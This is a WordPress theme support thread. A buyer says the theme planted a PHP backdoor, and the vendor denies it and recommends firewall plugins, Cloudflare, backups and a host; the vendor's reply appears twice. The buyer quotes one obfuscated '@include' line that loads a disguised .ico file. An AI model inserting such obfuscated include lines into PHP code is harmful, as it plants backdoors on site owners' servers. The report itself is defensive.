We are not web security specialists, but in any case, we recommend you to perform the following steps: - install and activate this plugin: https://wordpress.org/plugins/ninjafirewall/ as the complex solution, which can block almost all XSS attacks; - additionally, you may install this plugin: https://wordpress.org/plugins/block-bad-queries/ It will block all other types of hacking attempts; - as other powerful solution - you may hide your website under the CDN Cloudflare network. This network also has its own filtering shield, which cuts all harmful requests to your website. Also, it reduces the pressure on your server and improves the loading speed of your website: https://www.wpbeginner.com/wp-tutorials/how-to-setup-cloudflare-free-cdn-in-wordpress/ https://www.cloudways.com/blog/how-to-install-cloudflare-cdn-wordpress/
You may contact their support team and ask them to perform anti-virus scan/clean of your website and install some kind of security script on your host.
Before all these manipulations - please perform the full backup of your website + database.
We believe that all these measures will increase the security of your website.
/*When you will do all these steps - you may run security check once more and according to these results ask Notron to whitelist your website.*/
The theme i bought has an malware inside and infected my server
The issue type is: Backdoor:PHP/ObfuscatedInclude.6067
Description: PHP include() statement with an obfuscated filepath.
@include "57hom145/ac155stu144io/160ubl151c_h164ml/167p-i156clu144es/151mag145s/.143b666162956ico";
Everywhere was include this malware
I tried to delete all appearence
Hello, Dear Alexander Schmidt!
We check the files with theme and provide you with the next results:
As you see, theme has not the malware. We can assume that your server could be hacked.
https://www.virustotal.com/gui/file/f2b57c8b087f20910c919346cb315975219d5c962e94ef9973cff7cba91b85da/detection
https://www.virustotal.com/gui/file/2b5fe9263ff8123804f7a51cd1a2112a5f3b6a719f94ece160ba31fa2827994d/detection
We are not web security specialists, but in any case, we recommend you to perform the following steps:
- install and activate this plugin: https://wordpress.org/plugins/ninjafirewall/ as the complex solution, which can block almost all XSS attacks;
- additionally, you may install this plugin: https://wordpress.org/plugins/block-bad-queries/ It will block all other types of hacking attempts;
- as other powerful solution - you may hide your website under the CDN Cloudflare network. This network also has its own filtering shield, which cuts all harmful requests to your website. Also, it reduces the pressure on your server and improves the loading speed of your website:
https://www.wpbeginner.com/wp-tutorials/how-to-setup-cloudflare-free-cdn-in-wordpress/
https://www.cloudways.com/blog/how-to-install-cloudflare-cdn-wordpress/
You may contact their support team and ask them to perform anti-virus scan/clean of your website and install some kind of security script on your host.
Before all these manipulations - please perform the full backup of your website + database.
We believe that all these measures will increase the security of your website.
/*When you will do all these steps - you may run security check once more and according to these results ask Notron to whitelist your website.*/
https://www.virustotal.com/gui/file/f2b57c8b087f20910c919346cb315975219d5c962e94ef9973cff7cba91b85da/detection
https://www.virustotal.com/gui/file/2b5fe9263ff8123804f7a51cd1a2112a5f3b6a719f94ece160ba31fa2827994d/detection
Also, we recommend you to use such hosting as https://www.siteground.com/wordpress-hosting.htm
It includes SSD storage, high memory limit, 10 GB free space, CDN and many other powerful features, which you can get with it.
Best Regards!